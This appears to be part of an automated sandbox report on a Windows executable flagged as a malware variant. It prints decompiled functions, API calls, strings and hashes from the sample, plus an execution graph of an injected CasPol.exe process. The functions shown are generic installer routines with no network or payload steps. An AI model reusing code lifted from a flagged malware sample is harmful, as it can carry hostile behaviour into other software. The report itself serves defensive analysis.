0x00000000
0x742511b8
0x74251160
0x74251162
0x7425119e
0x00000000
0x7425119e
0x00000000
0x742512a1
0x742512a1
0x742512ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 74251171
GlobalAlloc.KERNEL32(00000040,?), ref: 742511E3
GlobalFree.KERNEL32 ref: 7425124A
GlobalFree.KERNEL32(?), ref: 7425129B
GlobalFree.KERNEL32(00000000), ref: 742512B1

Memory Dump Source

Source File: 00000000.00000002.1945649868.0000000074251000.00000020.00000001.01000000.00000004.sdmp, Offset: 74250000, based on PE: true

Associated: 00000000.00000002.1945555867.0000000074250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945760877.0000000074254000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1945856765.0000000074256000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74250000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 63ee2f4534c85c90f9b2e62b39ee7694a4b500b091dee87f4e42de163d5f3d8e
Instruction ID: 7db24d65b703d2a1fb914b31133429333706588f796fab11143f3d190b1ec1ff
Opcode Fuzzy Hash: 63ee2f4534c85c90f9b2e62b39ee7694a4b500b091dee87f4e42de163d5f3d8e
Instruction Fuzzy Hash: B451BE76B10212DFE700CF6AD848AB6F7F8EB48310B2141D5F906DB264EB34AA60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp", "C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nse53CA.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nse53CA.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse53CA.tmp$C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll
API String ID: 1659193697-4096628278
Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2f0
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2f8
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nse53CA.tmp", 7);
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c66

APIs

CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\nse53CA.tmp, xrefs: 00403C5B
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse53CA.tmp
API String ID: 2962429428-4014252121
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll), ref: 00406587

Strings

Call, xrefs: 0040653D

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405f84
0x00405f8e
0x00405f91
0x00405f97
0x00405f98
0x00405f99
0x00405fa1
0x00000000
0x00000000
0x00000000
0x00405fa1
0x00405fa3
0x00405fab

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00405F89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 00405F99

Strings

C:\Users\user\Desktop, xrefs: 00405F83

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 376, Parent PID: 8408COMMON

Execution Graph

Execution Coverage:	17.2%
Dynamic/Decrypted Code Coverage:	97.2%
Signature Coverage:	2.1%
Total number of Nodes:	145
Total number of Limit Nodes:	4

Executed Functions

Function 1D580C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91dd3b8012d387b35131a21960ac1ee71f61d6eb5b9b804626cea832464f714
Instruction ID: 5d1512c07996b87068e2a25a5094e99979964c546a55ba0ec6fe4ccd0704b4eb
Opcode Fuzzy Hash: e91dd3b8012d387b35131a21960ac1ee71f61d6eb5b9b804626cea832464f714
Instruction Fuzzy Hash: 4AD09EB604A1909FD70227B0EB595843F7CFA4323633916BAD086C9463CA6A0A14D731

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E35B Relevance: 1.8, APIs: 1, Instructions: 345COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 84bca6961e9c6b33c3fd9bf8a1cb42816a9dc98994fd647c617a74b9d54fb4d0
Instruction ID: e7a0fbf1e51b9b996bfe2f9bf8140fd4ddc49bdb9f0e267050a088c2b9000e4e
Opcode Fuzzy Hash: 84bca6961e9c6b33c3fd9bf8a1cb42816a9dc98994fd647c617a74b9d54fb4d0
Instruction Fuzzy Hash: 28029534901328CFDB66EF60C98868EB771BF49319F1045EAD80AA3355DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E41E Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 95ecaa2b76b16577e8a80d1713e63c5d975399376387b7d086671915ac4a0d46
Instruction ID: c005b0eac8ae9a334834b35cfa0fbc1842e5f6d23aca302bffe6215cb451d557
Opcode Fuzzy Hash: 95ecaa2b76b16577e8a80d1713e63c5d975399376387b7d086671915ac4a0d46
Instruction Fuzzy Hash: 67029674901328CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E465 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 43a23a418cd2b412cc1e05af72fe0f282e21a9be3cc146cb1189ad0c5fd76805
Instruction ID: 698a1696c787688290c09ce4eb40ed4671c85cf9c8bacdf711276b9809199fc1
Opcode Fuzzy Hash: 43a23a418cd2b412cc1e05af72fe0f282e21a9be3cc146cb1189ad0c5fd76805
Instruction Fuzzy Hash: 49F18574901328CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E4AC Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 55a23bc54a10d4ca604ab381e937e96ac3774e0cebf99979b43f742a72816678
Instruction ID: 8b149aa1ed50eab05158281be879c1989c7f26b39a4b97f5cf37e586a1f5d2df
Opcode Fuzzy Hash: 55a23bc54a10d4ca604ab381e937e96ac3774e0cebf99979b43f742a72816678
Instruction Fuzzy Hash: 5AF19574901328CFDB66EF60C98868EB771BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E4F3 Relevance: 1.8, APIs: 1, Instructions: 305COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8f73451cd98ea45f6272ac3f05088eebc1542c5b8ab1327aabab5b8e76356e6f
Instruction ID: 5ad7333708c7629ff1974a735ba71cf31398d35ac1a520b896d1d1206eb13222
Opcode Fuzzy Hash: 8f73451cd98ea45f6272ac3f05088eebc1542c5b8ab1327aabab5b8e76356e6f
Instruction Fuzzy Hash: 23F19534901368CFCB66EF60C98868EB771BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E53A Relevance: 1.8, APIs: 1, Instructions: 298COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a8a285998a72705746cc8e0307ab95dc636d6f6616820bb5165a8a1a07efcf24
Instruction ID: b59a29dc8b593aae0bc4d636d2ea6d6e7b64afbe343e612d957ee7680c50c742
Opcode Fuzzy Hash: a8a285998a72705746cc8e0307ab95dc636d6f6616820bb5165a8a1a07efcf24
Instruction Fuzzy Hash: D8F19634901368CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E581 Relevance: 1.8, APIs: 1, Instructions: 291COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e62733e2ac86ae255a6604c4e753893f4bc288caec6a6a0ab0435e0e01ad7315
Instruction ID: 0f0a7089d4d2c58c47f91e4bd4c1902c5ccdca04a37bd9a72a5a5bfe8cc4c1e0
Opcode Fuzzy Hash: e62733e2ac86ae255a6604c4e753893f4bc288caec6a6a0ab0435e0e01ad7315
Instruction Fuzzy Hash: F7E18534901368CFDB66AF60C98868EB775BF49319F1045EAD80AA3354DB325EC6CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E5C8 Relevance: 1.8, APIs: 1, Instructions: 284COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3930d1fb809054715c13d75f2442efc06a196aa4bd50310503c1807f7d509f07
Instruction ID: 4441d35e30e2ecd796bb0fc39d61a12c97ab2a63cdd9e19d0b7c53d32367fd53
Opcode Fuzzy Hash: 3930d1fb809054715c13d75f2442efc06a196aa4bd50310503c1807f7d509f07
